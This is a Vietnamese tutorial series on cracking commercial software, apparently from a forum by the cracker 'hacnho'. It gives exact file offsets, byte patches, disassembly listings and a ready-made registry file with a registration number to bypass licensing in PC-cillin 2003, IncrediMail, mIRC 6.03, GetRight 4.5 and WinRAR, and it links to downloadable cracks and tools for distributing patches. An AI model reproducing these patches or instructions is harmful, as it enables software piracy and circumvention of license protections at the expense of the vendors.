ha ha ha…Nếu không thích dòng registered to bạn có thể dùng Reshack sửa lạI thành crack by hacnho© 2003 -------------------------------- Ok bây giờ chúng ta qua phần 2 Hướng dẫn sử dụng File Patcher 4.0 (lên google search) File Patcher 4.0 là một công cụ patch trực tiếp không cần dùng đến HIEWS…các dùng rất dễ…Crack phần mềm cần crack, sau đó tìm ra offset để đổI bytes…Để cho các bạn dễ hiểu chúng ta lấy Winrar ở trên làm thí dụ…Chúng ta tìm được 3 offset cần đổI bytes…Như vậy chúng ta cần đổI 3 bytes 1.0004513C từ 75 thành 74 2.0003B0E9 từ 75 thành 74 3.0003E1FD từ 74 thành 75 Ok các bạn hãy mở notepad lên, sau đó gõ vào Offset= $0003B0E9: From $75 To $74 Offset= $0004513C: From $75 To $74 Offset= $0003E1FD: From $74 To $75 Sau đó save lạI vớI nộI dung: crack.txt Mở file patcher4.0 lên Trong dòng -File to be patched : tìm file cần crack -File after patching : save vào file nào (nên đặt là crack.exe) -patch data file: tìm đến file crack.txt vừa lưu Xong click process/apply patches Quá đơn giản phảI không các bạn Hướng dẫn sử dụng Cracker Engine ---

I. Cách dùng Cracker Engine :

Cracker Engine là một tool giúp các cracker dễ dàng hơn trong việc phân phối các bảng crack (bằng Patch) của mình.

Nếu người dùng muốn crack một chương trình bằng Cracker Engine, đầu tiên, họ sẽ tải bản chạy của Cracker Engine (CrackerEngine.EXE) xuống. Kế tiếp, download thêm phần data chứa các thông tin cần dùng để Cracker Engine có thể thi hành. Ví dụ trên trang web www27.brinkster.com/levuhoang/ có những data dành cho Cracker Engine là "DynamicSkinForm 4.61", "Snood 3.0", "Diamond Mind 1.5y"....

Nếu một người muốn crack chương trình Snood phiên bản 3.0, anh ta phải trải qua những bước sau :

* Download file CrackerEngine.ZIP trên Website về

* Download file Snood30.zip trên Website về

* Bung CrackerEngine.ZIP và Snood30.ZIP vào cùng thư mục

* Chạy CrackerEngine để crack Snood 3.0

Còn nếu một người đã có file CrackerEngine.EXE rồi mà anh ta muốn crack "Diamond Mind 1.5y" thì anh ta chỉ việc download file DSF461.ZIP trên Website về và bung vào cùng thư mục với CrackerEngine là xong.

Các ưu điểm của CrackerEngine :

* Data-file nhỏ, nhẹ (vào trăm bytes)

* Một lần download CrackerEngine.EXE cho tất cả

Các khuyết điểm của CrackerEngine :

* File CrackerEngine.EXE lớn (nhưng cũng chỉ download 1 lần)

* Chỉ dùng được trong các trường hợp cần Patch chương trình.

II. Cách dùng Patch Generator :

_ Patch Generator là một công cụ giúp tạo các file data cho CrackerEngine.

_ Đầu tiên, cracker giữ 1 bản sao cho chương trình cần crack.

_ Tiếp theo, Patch chương trình đó.

_ Chạy Patch Generator, chọn file gốc và file đã Patch. Lưu ý : Patch Generator sẽ lấy tên file cần patch theo CrackEd_File. Có nghĩa là nếu tên file đã crack của bạn tên là gì thì Patch Generator sẽ sử dụng tên đó khi Patch chứ không phải tên Original.

_ Gõ vào tên Thư mục mặc định mà chương trình thường Install.

_ Gõ vào tên Cracker, mail.

_ Icon cho file Data (được hiện trong CrackerEngine) sẽ mặc định là icon trong file đã crack. Nếu bạn muốn chọn một Icon khác thì nhấn vào Custom Icon.

_ Nhấn Generate để cho ra file data.

_ Upload lên Web để mọi người download file này về.

thế là chúng ta đã đi qua một phần nữa rồI các bạn, hẹn gặp lạI trong tut sau nhé
*********************************:
Phần VII:

Rất vui gặp lạI các bạn…Hôm nay chúng ta gặp nhau ở phần 7 này, để tiếp tục nâng cao tay nghề crack của các bạn hôm nay tôi sẽ hướng dẫn các bạn tập crack một số chương trình mớI nhất:

1. PC-cillin 2003 : Chương trình diệt virus khá lợI hạI, đang làm mưa làm gió cùng NAV, McAffe v..vv
2. 123 Icon Hunter v1-0-Full : Chương trình tìm các file *.ico
3. IncrediMail 934 : Chương trình duyệt mail khá bắt mắt vớI giao diện 3D…

Cũng xin nói thêm rằng bắt đầu từ hôm nay tôi sẽ không còn hướng dẫn các bạn một cách cặn kẽ nữa mà tôi chỉ nói rẩt vắn tắt chủ yếu đưa ra dạng, nơi cần crack, Sau 6 phần mà tôi đã hướng dẫn ở trên các bạn đã biết cách để crack…Nếu tôi tiếp tục hướng dẫn cụ thể nữa thì các bạn sẽ rất lệ thuộc vào tôi. Vì sao? Vì chỉ phần mềm nào tôi có hướng dẫn các bạn mớI crack được, còn không hướng dẫn thì các bạn sẽ không biết làm…
Từ phần 7 này, trong mỗI bài viết tôi sẽ hướng dẫn các bạn crack một hay hai phần mềm. Trong đó có một phần mềm cũ và một phần mềm mớI nhất…Đồng thờI cuốI bài viết tôi sẽ đưa ra một phần mềm để chúng ta cùng thảo luận cách crack, các bạn sẽ tìm ra cách crack cho mình và post lên…GiảI thưởng là…kiến thức cho bạn he he…Nếu các bạn không tìm ra cách crack thì tôi sẽ hướng dẫn…Nhưng xin nhớ cho rằng các bạn nên tự tập crack, đừng chờ lờI giảI đáp của tôi…Mong rằng các bạn sẽ tham gia nhiệt tình
----------------------------------
Ok, chúng ta bắt đầu vào crack…Tuy nhiên tôi muốn nhắn vớI các bạn rằng, tât cả bài viết của tôi đều do tôi bỏ công sức ra viết dựa trên kinh nghiệm thực tiễn mà tôi đúc kết được, mục đích là đem lạI kiến thức cho mọI ngườI cho nên các bạn có thể phổ biến bài viết của tôi nhưng xin các bạn vui lòng ghi lạI dòng “ bài viết của hacnho”…Chân thành cảm ơn các bạn
-------------------
Now, chúng ta sẽ cẩu đầu trảm phần mềm PC-cillin 2003, do tôi mớI tảI nó về trên mạng và đang bận thi cử nên không có thờI gian để chỉ các bạn dùng softIce để tìm real serial vớI lạI rất khó cho các bạn newbie vì dãy số serial là một dãy giống như CD key của Window…Nên tôi chọn các đơn giản nhất là patch nó.

Phần mềm : PC-cillin 2003
Download: www.trendmicro.com
File cần crack: PCCClient.exe
Công cụ : WinDasm 893, Hacker Views 640
Cracker: hacnho (www.vietcracks.com)

Đầu tiên chúng ta cài đặt PC-cillin 2003, sau khi cài đặt xong PC-cillin 2003 sẽ bắn cho bạn một cái nag yêu cầu đăng ký, sau đó bạn vào phần main của PC-cillin 2003, chọn tag Register, nó yêu cầu bạn nhập vào một dãy số serial, và một số license code…

Sau một hồI đánh vật vớI PC-cillin 2003, tôi tìm ra được phần quyểt định số phận của PC-cillin 2003 (bắt bạn đăng ký và hiện ra cái nag “30 days Trial” là ở file PCCClient.exe…)he he sao mà tui phục tui quá ke ke…Do tôi đang xài Win2000 nên để disable PCCClient.exe tôi chọn task manager, chọn End process file PCCClient.exe, copy nó ra một bản dự phòng, ok dùng WDASM 893 mở file PCCClient.exe lên, oh la la…tìm đến dòng “Your lincese has expired…” Double click vào nó ta thấy:

*Possible Referenced to String Resource ID=00129 “Your lincese has expired…”

:0040830C 6881000000 push 00000081
:00408311 8D8DE4FEFFFF lea ecx, dword ptr [ebp+FFFFFEE4]
:00408317 E873AD0200 call 0043308F
:0040831C 6A10 push 00000010

di chuyển vệt sáng lên vài chục dòng tớI dòng

:0040828D 7446 je 004082D5

bạn sẽ thấy

*Possible Referenced to String Resource ID=57351 “Trend Micro Pc-Cillin”

:00408254 6807E000000 push 0000E007
:00408259 8D4DF0 lea ecx dword ptr [ebp-10]
----
:00408286 838DB8FEFFFF64 cmp dword ptr [ebp + FFFFFEB8], 00000064
:0040828D 7446 je 004082D5 --> cần crack

Okie, chỗ ta cần crack ở đây là đổI thành EB…Nhớ đừng đổI thành JNE là die luôn đó hé hé

Tương tự chúng ta cũng tìm được hai offset cần crack nữa là
00008D04 và 00008D38…Do đâu mà tôi tìm được, câu tả lờI dành cho bạn đó..Tìm được rồI làm thế nào? Đơn giản thôi,

00008D04 từ 75 đổi thành EB
00008D38 từ 74 đổi thành EB

****Tổng kết lạI chúng ta có 3 bytes cần crack như sau

0000828d từ 74 đổi thành EB
00008D04 từ 75 đổi thành EB
00008D38 từ 74 đổi thành EB

Ok, dùng HIEWS để đổI lạI như trên…Bây giờ bạn hãy Enable PCCClient.exe lạI, Uh lạ quá sao mà nó vẫn hiện cái nag ra thể, tôi đã sai ở chỗ nào ặc ặc…Nếu bạn không tư duy một chút cứ nghĩ là chỉ cần đổI 3 bytes ở trên là xong, không dễ xơi như thế đâu, chúng ta crack file PCCClient.exe ở trên chỉ là để cho Pc-cillin chấp nhận ta thay đổI file reg của nó thôi he he…Bây giờ tôi vào phần chính đây…Khi bạn cài đặt PC-Cillin 20003 thì nó sẽ tạo trong registry của bạn những key

1. HKEY_LOCAL_MACHINE\Software\TrendMicro\Cfw
2. HKEY_LOCAL_MACHINE\Software\TrendMicro\FireWall
3.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Config
4.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Exception
5.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\FireWall
6.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Intelligent
7.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\MailScan
8.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\ManualScan
9.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Menu
10.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Misc
11.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Proxy
12.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Quarantine
13.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\RealTimeScan
14.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Support
15.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Update
16.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\WebTrap
17.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Wireless
18.HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin
Chỗ cần crack là thay đổI key 3 đến key 18…Chỗ này hơi phức tạp, thôi để cho các bạn dể hiểu tôi dịch từ key 3 đến key 18 ra một file hacnho.reg (chú ý file này tôi đã cracck rồI…Các bạn copy lạI, đem dán vào notepad, save lạI thành một file hacnho.reg, chạy để đăng ký…Các bạn có thể đem key này so sánh vớI nộI dung key chưa crack xem có sự thay đổI gì không ?
-----
REGEDIT4

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Config]
"Mode"=dword:00000001
"Menu"=dword:00000000
"Update"=dword:00000000
"MenuSet"=dword:00000000
"TipHelp"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Exception]
"File0"="none"
"File1"="none"
"File2"="none"
"File3"="none"
"File4"="none"
"File5"="none"
"File6"="none"
"File7"="none"
"File8"="none"
"File9"="none"
"File10"="none"
"File11"="none"
"File12"="none"
"File13"="none"
"File14"="none"
"File15"="none"
"File16"="none"
"File17"="none"
"File18"="none"
"File19"="none"
"Folder0"="none"
"Folder1"="none"
"Folder2"="none"
"Folder3"="none"
"Folder4"="none"
"Folder5"="none"
"Folder6"="none"
"Folder7"="none"
"Folder8"="none"
"Folder9"="none"
"Folder10"="none"
"Folder11"="none"
"Folder12"="none"
"Folder13"="none"
"Folder14"="none"
"Folder15"="none"
"Folder16"="none"
"Folder17"="none"
"Folder18"="none"
"Folder19"="none"

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\FireWall]
"dwSetting"=dword:00000000
"Locked"=dword:00000000
"HotSpot"=dword:00000000
"Profile"="PfwRule.dat"
"Installed"=dword:00000001
"AdaptersNum"=dword:00000000
"AdaptersList"=hex:
"Control"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Intelligent]
"OnOff"=dword:00000001
"ConnectLimit"=dword:00000000
"Interval"=dword:00002A30
"Start"=dword:00000017
"End"=dword:00000008
"Silent"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\MailScan]
"OnOff"=dword:00000001
"Splash"=dword:00000000
"Config"=dword:00000000
"Action"=dword:00000003
"Action2nd"=dword:00000004
"ZipClean"=dword:00000001
"ExtractFileSizeLimit"=dword:FFFFFFFF
"WebMail"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\ManualScan]
"Action"=dword:00000003
"Action2nd"=dword:00000002
"AllFile"=dword:00000001
"CleanBackup"=dword:00000001
"ZipScan"=dword:00000005
"BootScan"=dword:00000001
"ZipClean"=dword:00000001
"MoveDirectory"="C:\\Program Files\\Trend Micro\\PC-cillin 2003\\QUARANTINE"
"MoveDirectory2nd"="C:\\Program Files\\Trend Micro\\PC-cillin 2003\\QUARANTINE"
"FileTypeList"=".BIN.CLA.CLASS.COM.DOC.DOT.EXE.OBD.OBT.OBZ.OCX.OVL.SYS.VBS.XLS.XLT.SHS"
"GenericMacro"=dword:00000001
"ExtractFileSizeLimit"=dword:FFFFFFFF
"EncodeBackup"=dword:00000001
"LastMScanMethod"=dword:00000000
"LastMScanStartTime"="\"
"LastMScanTaskName"="\"
"LastMScanFinished"=dword:00000000
"LastMScanEndTime"="\"
"LastTScanMethod"=dword:00000000
"LastTScanStartTime"="\"
"LastTScanTaskName"="\"
"LastTScanFinished"=dword:00000000
"LastTScanEndTime"="\"
"AutoClose"=dword:00000000
"ExcludeExt"="\"

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Menu]
"SetMenu"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Misc]
"ExcludeExt"="\"

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Proxy]
"Proxy"=dword:00000000
"SERVER"="\"
"Port"=dword:00000050
"ID"="\"

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Quarantine]
"FirstTime"=dword:00000000
"CancelTime"=dword:00000000
"ShowGuide"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\RealTimeScan]
"Action"=dword:00000003
"Action2nd"=dword:00000002
"AllFile"=dword:00000000
"CleanBackup"=dword:00000001
"ZipScan"=dword:00000001
"ZipClean"=dword:00000001
"MoveDirectory"="C:\\Program Files\\Trend Micro\\PC-cillin 2003\\QUARANTINE"
"MoveDirectory2nd"="C:\\Program Files\\Trend Micro\\PC-cillin 2003\\QUARANTINE"
"FileTypeList"=".BIN.CLA.CLASS.COM.DOC.DOT.EXE.OBD.OBT.OBZ.OCX.OVL.SYS.VBS.XLS.XLT.SHS"
"RenameExt"=".VIR"
"InOut"=dword:0000000F
"IOScan"=dword:00000001
"Update"=dword:00000000
"PattnExt"=dword:00000001
"GenericMacro"=dword:00000001
"ExtractFileSizeLimit"=dword:FFFFFFFF
"MonitorNetwork"=dword:00000001
"EncodeBackup"=dword:00000001
"UserName"="Administrator"

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Support]
"System"=hex:B2,97,9D,9B,90,8D,9B,9A,5E,A8,9B,8C,8D,97,91,90

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Update]
"Year"=dword:00000000
"Month"=dword:00000000
"Day"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\WebTrap]
"UrlFilt"=dword:00000000
"WebFilt"=dword:00000000
"Splash"=dword:00000001
"Alert"=dword:00000000
"Action"=dword:00000001
"PassLock"=dword:00000000
"SendWait"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin\Wireless]
"Palm"=dword:00000000
"WinCE"=dword:00000000
"EPOC"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\TrendMicro\PC-cillin]
"Application Path"="C:\\Program Files\\Trend Micro\\PC-cillin 2003\\"
"register no."="OSJF-9999-6388-8759-0082"
"company"="vietcracks"
"name"="hacnho"
"version"="10.00"
"ProductCode"=dword:0000003B
"SourceDir"="C:\\Program Files\\Trend Micro\\PCC2003\\Setup\\"
"ProductGuid"="{CA7FDA46-DFA8-4748-8F2E-8864E545735B}"

[HKEY_LOCAL_MACHINE\Software\TrendMicro]

Okie, bây giờ bạn chạy lạI PC-Cillin 2003, xem oh la la, nó đã được crack….Xin chúc mừng bạn
Nếu các bạn lườI crack thì có thể down ở đây
Download: http://www.vietcracks.com/download/crackPC2k.zip

Hôm qua vào thấy các bạn hỏI về crack của IncrediMail 934…Tôi thì đang xài 884 nhưng cách crack này áp dụng cho version 934, sau khi crack bạn sẽ có được bản full preminium. Tôi sẽ hướng dẫn các bạn cách crack nó nhưng vắn tắt thôi vì tôi không có thờI gian (vợ đẻ con đau nhà hết gạo mà lị)…

Phần mềm : IncrediMail 884 to 934
Download: www.incredimail.com
File cần crack: ImUtils.dll
Công cụ : WinDasm 893, Hacker Views 640
Cracker: hacnho (www.vietcracks.com)

Ta cần crack tất cả là 5 bytes (có thể là 3 bytes)

Có ba offset cần crack

1. 16B49
2. 32418
3. 32450

*. ĐốI vớI offset 16B49 ta cần đổI từ JE sang JUMP, tức là 74 sang EB
ta làm như sau : đổI 3 bytes 0F849B thành E9A100, khi đó từ JE sẽ đổI sang JUMP…cách trên ta phảI đổI tớI 3 bytes lận, cách đơn giản hơn là chỉ đổI 1bytes là từ 84 sang EB

*.ĐốI vớI offset 32418 ta cần đổI từ into thành mov, do đó ta sẽ đổI từ CE thành B0

*.ĐốI vớI offset 32450 ta cần đổI filadd thành test, do đó ta sẽ đổI từ DE thành A8
Oh la la quá đơn giản phảI không các bạn, chỉ cần đổI 5 bytes là ta đã có được một bản full rồI hén…
Chú ý: Các bố nào lườI crack thì có thể download ở đây về xài:

Download: http://www.vietcracks.com/download/CrkIncrediMail.zip
-----------------
Phần THẢO LUẬN:

Chào các bạn, do là kỳ đầu tiên chúng ta sẽ thảo luận cách crack phần mềm 123 Icon Hunter v1-0-Full, download từ http://www.boilsoft.com/, giá của nó là $19.95. Ok chúng ta sẽ thảo luận cách crack nó…Các bạn download về và tập crack nó nhe…Sau đó các bạn post bài hướng dẫn của mình lên topic này…tôi sẽ chờ các bạn có lờI giảI rồI tôi mớI post tiếp phần 8 và hướng dẫn crack nó…
---------------
thế là chúng ta đã đi hết phần 7, trong phần 8 chúng ta sẽ học crack clicksee 3.0 và mIRC 603 (bản mớI nhất), đồng thờI tôi cũng đưa ra đáp án của phần mềm 123 Icon Hunter v1-0-Full

Hello, Welcome back !
He he xin chào các bạn, xin lỗi vì sự chậm trễ. Do mấy hôm nay bận soạn ra HTML một số tut để upload lên homepage vietcracks nên không kịp up lên cho các bạn phần 8, thành thật xin lỗi.
Phần VIII
Okie nào chúng ta bắt đầu thôi. E hèm hôm nay chúng ta sẽ đi vào phần 8, đây cũng là phần kết thúc của giai đoạn I: NHẬP MÔN CRACKER. Hôm nay chúng ta sẽ học gì nhỉ? Cụ thể như sau:
1. Học crack mIRC 603 (phiên bản mới nhất.)---> Chương trình chat thông dụng.
2. Học crack Getright Version 4.5 ---> Chương trình download cực mạnh
3. Học crack game của hãng PopCap.Com (học một dạng có thể crack hầu hết tất cả các game hiện nay của hãng này như Dynomite 2.00y, 2.01, Big Money Delux 1.11, Bejeweled 1.5, Alchemy, NINGPO MAHJONG DELUXE 1.04, SEVEN SEAS 1.13 vân vân). Vì sao, giống như ES4 hay EV Tran 2.0 tất cả các phiên bản hay chương trình của PopCap Games đều mã hoá serial theo cùng một kiểu….
4.Học viết Patch Gen cho các chương trình mình đã crack (bằng Pascal, C++, VB). Tôi sẽ lần lượt up lên. Trước tiên là bằng Pascal.
5. Các thuật ngữ, thuật toán cracker (Các bạn bổ sung thêm nếu thấy chưa đủ…).
6.Các thuật ngữ cơ bản ASSEMBLY dành cho các bạn muốn crack mà chưa hiểu gì lắm về ngôn ngữ này. (bổ sung sau ...)

PHẦN VIII :
I. Crack mIRC 603
Phần mềm : mIRC ver 603
Download : www.mirc.com
File crack : mirc.exe
Cracker : hacnho (VCT)
Bảo vệ : 30 days times trial

Chúng ta bắt đầu việc đầu tiên là try to crack mIRC version 603. Đây là một chương trình chat script khá phổ biến. Nhưng phiên bản này chỉ cho dùng thử 30 ngày. Điều đó buộc chúng ta phải crack nó . Đơn giản tôi là Maria mà lị he he. Do tôi còn trong Giai Đoạn I. Nên tôi chỉ hướng dẫn các bạn phương pháp cơ bản nhất của cracker là patch nó.(Thật ra phương pháp tạo serial của mIRC 603 rất đơn giản là thực hiện các phép toán nhân chia để tạo key. Giới hạn min của name nhập vào là 5 ký tự. Gồm hai vòng lặp chính. Nhưng thôi mình sẽ bàn đến phương pháp tính toán serial trong GIAI ĐOẠN II: Cracker Anh Là Ai?)

Đầu tiên bạn sao lưu file mirc.exe ra dự phòng. Chạy mIRC. Vào menu About--->Register. Nhập vào Full Name: hacnho, Registration Code: 151083. Enter, oh la la một nag văng ra "The registration name and number you have entered do not match....". Okie bạn hãy nhớ lấy nó. Vào W32DisAsm mở file mirc.exe. Chờ W32DisAsm file mirc xong bạn vào menu String Data Reference, tìm ra dòng có ghi thông báo ở trên, double click vào nó một lần, đóng hộp hội thoại String Ref lại, bạn đang ở đây

* Possible Reference to String Resource ID=01911: "Registration"
|
:004C698E 6877070000 push 00000777
:004C6993 E8D95DF6FF call 0042C771
:004C6998 50 push eax
:004C6999 6A00 push 00000000

* Possible Reference to String Resource ID=01912: "The registration name and number you have entered do not
mat"
|
:004C699B 6878070000 push 00000778 <--- bạn đang ở đây :004C69A0 E8CC5DF6FF call 0042C771 :004C69A5 50 push eax :004C69A6 FF7508 push [ebp+08] Okie hãy di chuyển vệt sáng lên trên, tới khi bạn gặp dòng những dòng sau ------ * Reference To: USER32.SendDlgItemMessageA, Ord:0000h | :004C6884 E8E96A0900 Call 0055D372 :004C6889 68DFCD5700 push 0057CDDF :004C688E 68F8C95700 push 0057C9F8 :004C6893 E821FBFFFF call 004C63B9 :004C6898 85C0 test eax, eax :004C689A 0F84B7000000 je 004C6957 <--- Cần crack, chú ý (1) :004C68A0 C60552CA570000 mov byte ptr [0057CA52], 00 :004C68A7 BE28305800 mov esi, 00583028 :004C68AC BFF8C95700 mov edi, 0057C9F8 :004C68B1 33C0 xor eax, eax --------- * Possible Ref to Menu: MenuID_003C, Item: "Register..." | • Possible Reference to String Resource ID=00134: "* Unloaded agent '%s'" Nếu bạn chỉ dừng ở đây thì chưa xong. Tại sao, nếu chúng ta crack ở đây thì chỉ hiện thông báo "Your registration has been entered successfully.". Nhưng khi khởi động lại thì không được chấp nhận serial. Híc híc…Xem nào chúng ta thử suy nghĩ một chút…Khi chúng ta đăng ký rồi nếu đúng thì thằng Mirc sẽ liên kết với một chỗ nào trong file để xoá menu “ Register…” đi…Suy rộng ra chúng ta sẽ tìm tới chỗ đoạn mã của menu “ Register…” để “hiệu chỉnh” nó lại. Tức là nhập vào giá trị nào nó cũng sẽ xoá menu “ Register…” đi . Okie chúng ta quay trở lại W32DisAsm, vào menu tìm dòng “ Register…” . ủa sao không thấy dòng nào cà??? Đừng lo lắng, hãy vào menu Reference Item, hãy double click cho tới khi nào bạn gặp dòng “ Register…” mà bên dưới có dòng * Reference To: USER32.DeleteMenu, Ord:0000h mới được vì đây là đoạn mã dùng để xoá menu khi nhập đúng serial. Nếu bạn tìm tìm ra dòng “ Register…” mà không có dòng DeleteMenu thì không crack được . Nếu tìm đúng bạn sẽ thấy như sau: * Possible StringData Ref from Data Obj ->"License"
|
:004C6681 68BFA55600 push 0056A5BF
:004C6686 E890FBFFFF call 004C621B
:004C668B 85C0 test eax, eax
:004C668D 7458 je 004C66E7 <--- Cần crack, Chú ý. (2) :004C668F 68DFCD5700 push 0057CDDF :004C6694 68F8C95700 push 0057C9F8 :004C6699 E81BFDFFFF call 004C63B9 :004C669E 85C0 test eax, eax :004C66A0 7445 je 004C66E7 :004C66A2 6A00 push 00000000 * Possible Ref to Menu: MenuID_003C, Item: "Register..." | * Possible Reference to String Resource ID=00134: "* Unloaded agent '%s'" | :004C66A4 6886000000 push 00000086 :004C66A9 FF3568AA5600 push dword ptr [0056AA68] * Reference To: USER32.DeleteMenu, Ord:0000h | :004C66AF E8426A0900 Call 0055D0F6 :004C66B4 C60552CA570000 mov byte ptr [0057CA52], 00 :004C66BB BE28305800 mov esi, 00583028 :004C66C0 BFF8C95700 mov edi, 0057C9F8 :004C66C5 33C0 xor eax, eax ---------- Từ (1) và (2) ta sẽ có hai chỗ cần crack đó là: 1. Thay đổi (1) từ 84 thành 85 tức cho nó từ nhập đúng serial thì nhảy thành nhập sai thì nhảy…Bạn dùng Hiews, mở file mirc.exe (lưu ý nên đóng mirc khi chạy hiew). Nhấn F4 chọn decode, nhấn f5 , gõ 000C5E9A , nhấn F3 đổi 84 thành 85 (jz thành jnz) 2.Thay đổi (2) từ 74 thành 75 tức cho nó từ nhập đúng serial thì xoá menu Register” thành nhập sai thì xoá menu “Register” …Bạn dùng Hiews, mở file mirc.exe (lưu ý nên đóng mirc khi chạy hiew). Nhấn F4 chọn decode, nhấn f5 , gõ 000C5C8D , nhấn F3 đổi 74 thành 75 (jz thành jnz). Okie bây giờ bạn hãy chạy thử Mirc 603 và đăng ký lại xem… try it and get it !!! Cách crack ở trên chỉ dành cho newbie thôi, vì cách crack đó chỉ cho dùng mIRC miễn phí mà thôi ---> không phải đăng ký, nhưng mà chúng ta thì được voi đòi tiên mà hi` hi` muốn rằng mỗi khi vào menu HELP>About thì thì dòng Licenced to: …. mới được >>>làm như ta đây là mua thật vậy hic hic . Mình có cách chỉ patch duy nhất một byte thôi mà được dùng như mua thật sự vậy . Do thời gian có hạn nên mình chỉ đưa ra địa chỉ cùng các crack thôi, còn phương pháp crack thì phải dùng SI (mà tôi chưa có hướng dẫn dùng SI cho các bạn) tìm ra hàm tạo serial rồi patch nó…Nên bạn nào khá hãy tìm ra phương pháp crack cho mình.
-------
Hướng dẫn: bạn tìm đến địa chỉ RVA 004C6448, đổi 74 thành 75 (jz thành jnz). Okie hãy đăng ký lại xem, wow quá tuyệt phải không??? còn tại sao mà tôi tìm ra được “ vùng cấm địa” đó là công việc của các bạn nhe .Tự tìm hiểu lấy :
-------
Download: http://www.vietcracks.com/download/crackmirc603.rar

II.Now, chúng ta bước qua chương trình crack thứ hai, đó là Getright 4.5.

Phần mềm : Getright ver 4.5
Download : www.getright.com
File crack : getright.exe
Cracker : hacnho (VCT)
Bảo vệ : Trial Version

Getright ver 4.5 là một phần mềm download khá mạnh, nhưng phiên bản trial dùng thử thì bị hạn chế các tính năng, điều đó buộc chúng ta phải crack để sử dụng hết các chức năng của nó .
Đầu tiên bạn nên sao lưu file getright.exe lại thành một bản backup. Chạy GetRight Tray Icon trên thanh Start. Right click tại icon getright. Vào menu about. Wow! Bạn thấy có ba nút lệnh (command button) quan trọng “Buy now!”, “Buy”, và “Enter Code”. Okie bây giờ bạn click vào nút “Enter Code”, nhập một số bất kỳ (không nhập chữ). Ở đây tôi nhập là 151083, nhấn OK, oh la la một nag văng ra "Invalid registration code. Please verify that it is entered". Bạn hãy ghi nhớ lấy nó. Mở Windasm ra, disasm file getright.exe. Chờ nó disasm xong bạn vào menu String ref, kiếm dòng thông báo "Invalid registration code. Please verify that it is entered", double click vào nó. Đóng Ref lại. Bây giờ bạn đang ở đây:

* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0049F6A8©
|
:0049F6FC 6A00 push 00000000
:0049F6FE 6A00 push 00000000
:0049F700 8D4DF0 lea ecx, dword ptr [ebp-10]
:0049F703 E80FA0FFFF call 00499717
:0049F708 85C0 test eax, eax
:0049F70A 7409 je 0049F715 <--- Chú ý, cần crack (1) * Referenced by a (U)nconditional or ©onditional Jump at Address: |:0049F6FA(U) | :0049F70C 8BCF mov ecx, edi :0049F70E E832320600 call 00502945 :0049F713 EB0A jmp 0049F71F * Referenced by a (U)nconditional or ©onditional Jump at Addresses: |:0049F685©, :0049F70A© | * Possible Reference to String Resource ID=00123: "Invalid registration code. Please verify that it is entered" | :0049F715 6A7B push 0000007B :0049F717 57 push edi :0049F718 E82B330200 call 004C2A48 :0049F71D 59 pop ecx :0049F71E 59 pop ecx * Possible Reference to String Resource ID=00123: "Invalid registration code. Please verify that it is entered" | :0049F715 6A7B push 0000007B <--- Bạn đang ở đây :0049F717 57 push edi :0049F718 E82B330200 call 004C2A48 :0049F71D 59 pop ecx :0049F71E 59 pop ecx Chúng ta biết rằng khi serial nhập vào thì nhập vào ô "RegistrationCode", sau đó nó kiểm tra và liên kết tới nút “OK”. Chúng ta chỉ cần crack ở đoạn mã này. Vào menu String Ref, kiếm ra dòng chữ "RegistrationCode", double click để tìm, đóng ref lại. Chúng ta đang ở đây: * Possible StringData Ref from Data Obj ->"%s"
|
:0049F690 68444B5700 push 00574B44
:0049F695 50 push eax
:0049F696 E868050600 call 004FFC03
:0049F69B 83C40C add esp, 0000000C
:0049F69E 8D4DF0 lea ecx, dword ptr [ebp-10]
:0049F6A1 E8699BFFFF call 0049920F
:0049F6A6 85C0 test eax, eax
:0049F6A8 7452 je 0049F6FC <--- Chú ý cần crack (2) :0049F6AA 8B36 mov esi, dword ptr [esi] :0049F6AC E8FC220700 call 005119AD :0049F6B1 8B4004 mov eax, dword ptr [eax+04] :0049F6B4 56 push esi * Possible StringData Ref from Data Obj ->"RegistrationCode"
|
:0049F6B5 68484B5700 push 00574B48 <<-- bạn đang ở đây ! * Possible StringData Ref from Data Obj ->"Config"
|
:0049F6BA 68184B5700 push 00574B18
:0049F6BF 8BC8 mov ecx, eax
:0049F6C1 E8E5CA0600 call 0050C1AB
:0049F6C6 57 push edi
:0049F6C7 8D8DA0FEFFFF lea ecx, dword ptr [ebp+FFFFFEA0]
:0049F6CD E8DB0B0200 call 004C02AD
:0049F6D2 8D8DA0FEFFFF lea ecx, dword ptr [ebp+FFFFFEA0]
